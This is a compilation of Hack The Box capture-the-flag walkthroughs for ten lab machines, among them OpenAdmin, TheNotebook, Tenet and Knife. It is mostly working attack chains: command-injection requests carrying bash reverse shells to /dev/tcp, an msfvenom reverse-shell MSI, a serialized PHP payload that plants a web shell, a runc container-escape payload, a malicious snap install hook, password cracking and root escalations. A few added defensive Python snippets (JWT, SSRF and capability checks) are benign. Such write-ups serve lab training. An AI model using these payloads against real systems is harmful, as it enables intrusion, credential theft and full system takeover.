Hack The Box solution: OpenAdmin ~ 10.10.10.171

Enumeration

Scan open ports with RustScan:

Use dirsearch:

python3 dirsearch.py -u http://10.10.10.171/

Access: http://10.10.10.171/ona/

We see that: “Your version = v18.1.1”

Searching Exploit Database, we find OpenNetAdmin 18.1.1 – Command Injection Exploit (Metasploit).

Foothold

Send a POST request to the server with the data:

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo+'begin';id;echo+'end';&xajaxargs[]=ping

And the command is executed.

Start a netcat listener on our machine:

nc -lvnp 1234

Call back to our listener with:

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo+'begin';bash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.11/1234+0>%261';echo+'end';&xajaxargs[]=ping

There are 2 users:

We get jimmy's password from /opt/ona/www/local/config/database_settings.inc.php

Spawn a TTY shell with:

python3 -c 'import pty;pty.spawn("/bin/bash");'

Change to jimmy:

su jimmy

Find jimmy's files with:

find / -type f -user jimmy 2>/dev/null | grep -v '/proc/'

We found 3 files:

Read main.php

index.php

So we need to log in as jimmy, and then we will have joanna's SSH private key.

Check local open ports with:

(netstat -punta || ss --ntpu)

So I think the internal site is hosted on port 52846.

And we can easily get the key with:

curl localhost:52846/main.php -H 'Session: username=jimmy'

Save the key to a file named id_rsa.

We will use John the Ripper's ssh2john.py to crack the private key.

python3 ssh2john.py id_rsa > hash

Next, we use John the Ripper and rockyou.txt.

john-the-ripper -w=rockyou.txt hash

Then we can connect via SSH:

chmod 600 id_rsa
ssh -i id_rsa joanna@10.10.10.171

And we have the key.

Privilege Escalation

Check what we can do with:

sudo -l

Following the steps in GTFOBins, we can easily get root.

sudo nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

Hack The Box solution: Pit ~ 10.10.10.241

Enumeration

Scan open ports with RustScan:

rustscan -a 10.10.10.241 -- -sCV

Port 9090 is open, so we access: https://10.10.10.241:9090/

But we cannot log in.

There is a host in the nmap output:

dms-pit.htb

Add the host to /etc/hosts:

10.10.10.241	dms-pit.htb

But this site returns Forbidden.

Run a UDP scan:

sudo nmap -sCVU 10.10.10.241

Port 161 is open with the Simple Network Management Protocol (SNMP) service.

We will use the SNMP tool snmpbw.pl for this machine.

./snmpbw.pl 10.10.10.241 public 2 1
cat 10.10.10.241.snmp

We found directories:

and usernames:

Access the directory we found:

http://dms-pit.htb/seeddms51x/seeddms

We can log in using the username we found; the password is the same as the username.

Searching for SeedDMS in Exploit Database, we find SeedDMS versions < 5.1.11 – Remote Command Execution.

Go to our Docs -> Users -> Michelle:

Add a document; we will upload '1.php' to the server.

Then, go to the file (change the document id):

http://dms-pit.htb/seeddms51x/data/1048576/32/1.php?cmd=cat+/etc/passwd

And the command is executed.

After a little enumeration, we find:

http://dms-pit.htb/seeddms51x/data/1048576/33/1.php?cmd=cat%20/var/www/html/seeddms51x/conf/settings.xml

View page source for a better view:

Foothold

Using this password with the username we found before, we can log in to: https://pit.htb:9090/

Go to Terminal, we can get the flag:

Privilege Escalation

When using the SNMP tool, we found:

cat /usr/bin/monitor

We will create check.sh for /usr/bin/monitor to execute.

In our machine, run:

ssh-keygen

Create check.sh:

#!/bin/bash
echo 'your-public-key' > /root/.ssh/authorized_keys

Host an HTTP server:

python3 -m http.server 8080

In michelle's terminal, we run:

curl http://10.10.16.4:8080/check.sh -o /usr/local/monitoring/check.sh

After uploading the file, in our machine, run:

sudo apt-get install snmp-mibs-downloader
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects

And check.sh is executed; connect via SSH:

ssh -i id_rsa root@10.10.10.241

Hack The Box solution: TheNotebook ~ 10.10.10.230

Enumeration

Scan open ports with RustScan:

rustscan -a 10.10.10.230 -- -sCV

Access the web: http://10.10.10.230/

Register an account and log in. View the cookie:

This page uses a JWT token; decode it with JSON Web Tokens – jwt.io.

There is a field named "admin_cap" with the value false.

The token uses a "kid" header; we can read more in Hacking JWT Tokens: kid Claim Misuse — Key Leak.
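As an added defender-side example (not code from the writeup), this Python sketch shows how a server should handle "kid": only as a lookup into a fixed map of trusted keys, so a kid that names a file path or URL is rejected before any signature check, and "admin_cap" is read only after the signature verifies. It uses HS256 with the standard library so it runs offline; the key id and secret are constructed.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo key set. "kid" is only ever used as a key into this map,
# so a kid carrying a file path or URL can never reach the filesystem or network.
TRUSTED_KEYS = {"app-key-1": b"constructed-demo-secret-1"}

def _b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def make_token(kid: str, claims: dict, secret: bytes) -> str:
    """Build an HS256 token (helper to produce input for the checks below)."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT", "kid": kid}).encode())
    body = _b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"

def verify_token(token: str) -> Optional[dict]:
    """Return the claims if the token is valid, else None.
    Fails closed on malformed input, unexpected alg, unknown kid or bad signature."""
    try:
        h_part, b_part, s_part = token.split(".")
        header = json.loads(_b64url_decode(h_part))
        signature = _b64url_decode(s_part)
    except ValueError:  # wrong number of parts, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    kid = header.get("kid")
    secret = TRUSTED_KEYS.get(kid) if isinstance(kid, str) else None
    if secret is None:  # unknown kid: reject, never fetch or open anything
        return None
    expected = hmac.new(secret, f"{h_part}.{b_part}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    claims = json.loads(_b64url_decode(b_part))
    return claims if isinstance(claims, dict) else None

def is_admin(token: str) -> bool:
    """admin_cap is trusted only after the signature has been verified."""
    claims = verify_token(token)
    return claims is not None and claims.get("admin_cap") is True
```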

Foothold

Create a private RSA key on our machine:

openssl genrsa -out privKey.key 2048

Continue using JSON Web Tokens – jwt.io to encode a JWT token with our private key. Change the value of "admin_cap" to true and change "kid" to point to our key file.

Then, host an HTTP server:

python3 -m http.server

Paste the new token into the Cookie and reload the webpage.

Now, we have the admin page. Go to Admin Panel:

We can upload files; we will upload php-reverse-shell.php (after changing the IP) to the server.

Start a netcat listener on our machine:

nc -lvnp 1234

And view the file:

We found a backup file in /var/backups.

Host an HTTP server on the target machine:

python3 -m http.server 1235

And fetch the file on our machine:

wget http://10.10.10.230:1235/home.tar.gz

We found a private key for SSH.

Then connect via SSH with:

ssh -i id_rsa noah@10.10.10.230

And we have the flag.

Privilege Escalation

Check what we can do with:

sudo -l

Check docker version:

docker --version

This machine is vulnerable to CVE-2019-5736; follow the steps in Runc exploit (CVE-2019-5736).

Download main.go and change the payload in the file to:

var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.47/1234 0>&1"

On our machine, run:

go build main.go

Host an HTTP server on our machine:

python3 -m http.server

And in another terminal start a netcat listener:

nc -lvnp 1234

In the target machine, run:

sudo docker exec -it webapp-dev01 bash
wget http://10.10.14.47:8000/main
chmod +x main
./main

Quickly, in another SSH terminal, execute:

sudo docker exec -it webapp-dev01 /bin/sh

And we have the flag.

Hack The Box solution: Explore ~ 10.10.10.247

Enumeration

Scan open ports with RustScan:

rustscan -a 10.10.10.247 -- -sCV

Service details:

Searching Exploit Database, we find ES File Explorer 4.1.9.7.4 – Arbitrary File Read.

Foothold

Using the exploit, we get a list of pictures:

python3 50070.py listPics 10.10.10.247

There is a file named 'creds.jpg'. Get this file:

python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

And now we have a credential.

Connect via SSH:

ssh kristi@10.10.10.247 -p 2222

We will get the flag in /sdcard.

Privilege Escalation

Check listening ports with:

netstat -l

Port 5555 is open.

We will use SSH tunneling for this machine.

ssh -L 5555:127.0.0.1:5555 -N -f kristi@10.10.10.247 -p 2222

Then use adb.

adb connect 127.0.0.1:5555
adb shell
su

And the flag is in /data.

Hack The Box solution: Love ~ 10.10.10.239

Enumeration

Use nmap to find open ports:

nmap -sCV 10.10.10.239

Access the web:

http://10.10.10.239/

In the nmap result, we found a host: staging.love.htb. Add this host to your /etc/hosts:

10.10.10.239    staging.love.htb

Access the web.

Select Demo:

http://staging.love.htb/beta.php

Port 5000 is open, but when we access:

http://10.10.10.239:5000/

So I think of Server-side request forgery (SSRF) and input this URL in the Free File Scanner:

127.0.0.1:5000

And we have the admin credential.
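The scanner above fetched an internal service because it never checked where the URL pointed. As an added example (not code from the writeup or the Voting System), this Python filter shows what such a server-side fetch should do before making the request: allow only http/https, and reject localhost names and any IP literal that is loopback, private, link-local, multicast or IPv4-mapped into IPv6. It assumes an offline setting, so hostnames that need DNS are rejected rather than resolved.

```python
import ipaddress
from typing import Optional, Union
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

def parse_ip_literal(host: str) -> Optional[IPAddress]:
    """Return the address if host is a plain IPv4/IPv6 literal, else None.
    Shorthand or decimal forms (127.1, 2130706433) fail this parse on purpose."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None

def is_safe_fetch_target(url: str) -> bool:
    """Decide whether a user-supplied URL may be fetched server-side.
    Assumption for this offline demo: no DNS is done, so hostnames are rejected;
    a real filter would resolve them and check every returned address the same way."""
    try:
        parts = urlsplit(url if "://" in url else "http://" + url)
    except ValueError:  # e.g. an unbalanced IPv6 bracket
        return False
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    host = parts.hostname  # lower-cased, brackets and user:pass@ already stripped
    if host == "localhost" or host.endswith(".localhost"):
        return False
    ip = parse_ip_literal(host)
    if ip is None:
        return False
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    # is_global excludes loopback, private, link-local and reserved ranges;
    # multicast is excluded separately because older Pythons count it as global.
    return ip.is_global and not ip.is_multicast
```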

Back in the Voting System we cannot log in, so I go to:

http://10.10.10.239/admin/

And we can login here.

Foothold

In Voters List, we can upload a file to the server.

We will upload php_reverse_shell.php to the server (after changing the IP).

Start a netcat listener on our machine:

nc -nvlp 1234

And we found the flag.

Privilege Escalation

Check AlwaysInstallElevated:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Create our MSI file with:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.9 LPORT=1235 -f msi -o reverse.msi

Upload the file to the server the same way we uploaded the reverse shell. The file will be saved in C:\xampp\htdocs\omrs\images

Start a netcat listener on our machine:

nc -nvlp 1235

And execute the MSI file with:

msiexec /quiet /qn /i reverse.msi

Hack The Box solution: Tenet ~ 10.10.10.223

Enumeration

Use nmap to find open ports:

nmap -sCV 10.10.10.223

Add this to your /etc/hosts:

10.10.10.223	tenet.htb

Read Migration and we find a comment.

Try http://tenet.htb/sator.php but we find nothing.

So I try: http://10.10.10.223/sator.php

And download the backup file:

http://10.10.10.223/sator.php.bak

Foothold

The vulnerability here is a PHP object injection; you can get more information in Exploiting PHP deserialization.

I will write a new PHP shell on the server. We can generate the payload with:

<?php
class DatabaseExport
{
   public $user_file = 'users.php';
   public $data = '<?php system($_GET["cmd"])?>';
}
print urlencode(serialize(new DatabaseExport));
?>

Then we have:

O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A9%3A%22users.php%22%3Bs%3A4%3A%22data%22%3Bs%3A28%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3F%3E%22%3B%7D

And send the payload to the server by accessing:

http://10.10.10.223/sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A9%3A%22users.php%22%3Bs%3A4%3A%22data%22%3Bs%3A28%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3F%3E%22%3B%7D

Start a netcat listener on our machine:

nc -lvnp 1234

And call back to our listener with:

http://10.10.10.223/users.php?cmd=/bin/bash%20-c%20%22bash%20-i%20%3E&%20/dev/tcp/10.6.63.158/1234%200%3E&1%22

The payload we use is:

/bin/bash -c "bash -i >& /dev/tcp/10.6.63.158/1234 0>&1"

Read the file /var/www/html/wordpress/wp-config.php and we have neil's password.

Try to use this password to connect to SSH.

ssh neil@10.10.10.223

Privilege Escalation

Check what we can do with:

sudo -l

Read this file:

cat /usr/local/bin/enableSSH.sh

The script writes an SSH public key to a file in /tmp and then copies it to /root/.ssh/authorized_keys.

We need to use a race condition: write our public key to the file in /tmp before it is copied to /root.

On our machine, run:

ssh-keygen

Our public key is saved in id_rsa.pub; we will write this key to /tmp with:

while true; do echo 'your-public-key' | tee /tmp/ssh-* > /dev/null; done

In another terminal, we run:

touch output.txt
while ! grep "creating" output.txt; do sudo /usr/local/bin/enableSSH.sh > output.txt; done

And when the loop in the second terminal stops, we can SSH in as root.

ssh -i id_rsa root@10.10.10.223

Hack The Box solution: Cap

Enumeration

Access website: http://10.129.121.201/

Selecting Security Snapshot (5 Second PCAP + Analysis), we land on a link:

http://10.129.121.201/data/1

We can download a pcap file here, but there is nothing in it, so I go to:

http://10.129.121.201/data/0

Download the pcap file and open it with Wireshark. Using Follow TCP Stream, we find the user and password in Stream 3.

Foothold

This is an FTP credential, but we can log in to SSH with it.

ssh nathan@10.129.121.201

Privilege Escalation

We will use getcap to examine file capabilities.

getcap -r / 2>/dev/null

/usr/bin/python3.8 has cap_setuid.

We get a root shell with:

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

And we found root's flag.
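The getcap finding above is something a defender can audit for without the getcap binary: the capabilities live in the security.capability extended attribute. As an added example (not code from the writeup), this Python decodes that xattr (struct vfs_cap_data, revisions 2 and 3) and flags files whose permitted set includes capabilities such as cap_setuid that hand root to whoever can run the binary; the audit walk needs Linux, the decoder runs anywhere.

```python
import os
import struct
from typing import Dict, List, Tuple

# Capability bit numbers from linux/capability.h (subset; others print as cap_<n>).
CAP_NAMES = {0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
             3: "cap_fowner", 6: "cap_setgid", 7: "cap_setuid", 12: "cap_net_admin",
             13: "cap_net_raw", 19: "cap_sys_ptrace", 21: "cap_sys_admin"}
# Capabilities that let whoever can run the file reach root or read any file.
DANGEROUS = {"cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
             "cap_setgid", "cap_setuid", "cap_sys_ptrace", "cap_sys_admin"}
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x00000001

def decode_security_capability(raw: bytes) -> Dict[str, object]:
    """Decode struct vfs_cap_data: little-endian magic_etc, then two
    {permitted, inheritable} u32 pairs (low word, high word); revision 3
    appends the user-namespace rootid."""
    if len(raw) < 20:
        raise ValueError("security.capability too short")
    magic, p_lo, i_lo, p_hi, i_hi = struct.unpack_from("<5I", raw, 0)
    rev = magic & VFS_CAP_REVISION_MASK
    if rev not in (0x02000000, 0x03000000):
        raise ValueError("unsupported vfs_cap_data revision 0x%08x" % rev)
    permitted = p_lo | (p_hi << 32)
    names = [CAP_NAMES.get(b, "cap_%d" % b) for b in range(64) if permitted >> b & 1]
    rootid = struct.unpack_from("<I", raw, 20)[0] if rev == 0x03000000 and len(raw) >= 24 else 0
    return {"permitted": names, "inheritable": i_lo | (i_hi << 32),
            "effective": bool(magic & VFS_CAP_FLAGS_EFFECTIVE), "rootid": rootid}

def dangerous_caps(decoded: Dict[str, object]) -> List[str]:
    """Permitted capabilities that warrant review, sorted for stable output."""
    return sorted(DANGEROUS.intersection(decoded["permitted"]))

def audit_capabilities(root: str) -> List[Tuple[str, List[str]]]:
    """Walk root and return (path, caps) for every file carrying a dangerous
    permitted capability; this is what `getcap -r /` surfaces."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                raw = os.getxattr(path, "security.capability", follow_symlinks=False)
                hits = dangerous_caps(decode_security_capability(raw))
            except (OSError, ValueError, AttributeError):
                continue  # no xattr (ENODATA), unreadable, malformed, or non-Linux os
            if hits:
                findings.append((path, hits))
    return findings
```

Running audit_capabilities("/usr") on the Cap box would list /usr/bin/python3.8 with cap_setuid, matching the getcap output above.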

Hack The Box solution: Spectra ~ 10.10.10.229

Enumeration

Use nmap to find open ports:

nmap -sCV 10.10.10.229

Access the web: http://10.10.10.229/

Click Software Issue Tracker; you may need to add this to your /etc/hosts:

10.10.10.229	spectra.htb

Click Test, and go to http://spectra.htb/testing/

Go to wp-config.php.save and view the page source; we can see a MySQL credential.

Login to WordPress with username “administrator” and the password we found.

And we can log in.

Foothold

We will use Metasploit for this machine.

use exploit/unix/webapp/wp_admin_shell_upload

Set PASSWORD, RHOSTS, TARGETURI, USERNAME, LHOST and exploit the machine.

Privilege Escalation

Find SUID files with:

find / -type f -perm -u=s 2>/dev/null

And we can easily get root with:

/bin/bash -p

The user's flag is in /home/katie.

And root's flag is in /root.

Hack The Box solution: Armageddon ~ 10.10.10.233

Enumeration

Use nmap:

nmap -sCV 10.10.10.233

Access the web page:

This site is using Drupal 7.

Foothold

We will use Metasploit to exploit this machine.

use exploit/unix/webapp/drupal_drupalgeddon2

Set RHOSTS and LHOST, then exploit.

Find the name of the user:

cat /etc/passwd

We can use Hydra with rockyou.txt to brute-force the SSH password.

hydra -l brucetherealadmin -P rockyou.txt 10.10.10.233 ssh

And connect via SSH:

ssh brucetherealadmin@10.10.10.233

We have the flag.

Privilege Escalation

See what we can do with:

sudo -l

So we can run snap install as root; follow the steps in GTFOBins.

You may need to install fpm.

On our machine, run:

COMMAND='cat /root/root.txt'
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

Then, host an HTTP server on our machine:

python3 -m http.server

On the server, run:

curl http://10.10.16.13:8000/xxxx_1.0_all.snap -o xxxx_1.0_all.snap

And get the flag with:

sudo snap install xxxx_1.0_all.snap --dangerous --devmode

Hack The Box solution: Knife ~ 10.10.10.242

Enumeration

Use nmap:

nmap -sCV 10.10.10.242

Access the webpage.

And view the response; we see:

This site is using PHP/8.1.0-dev; this PHP version has a backdoor. We can get more details in php-8.1.0-dev-backdoor-rce.

Try injecting a User-Agentt header containing the command, and it is executed:

User-Agentt: zerodiumsystem('id');

Foothold

We will connect to the server via SSH; generate a key pair with:

ssh-keygen

Our public key is saved in id_rsa.pub; we will write this key to /home/james/.ssh/authorized_keys with:

echo "public_key" > /home/james/.ssh/authorized_keys

And we connect via SSH with:

ssh james@10.10.10.242 -i id_rsa

And we have the user's flag.

Privilege Escalation

See what we can do with:

sudo -l

So we can run knife as root; we will use knife exec to run system commands as root.

sudo knife exec -E 'system("id")'
sudo knife exec -E 'system("cat /root/root.txt")'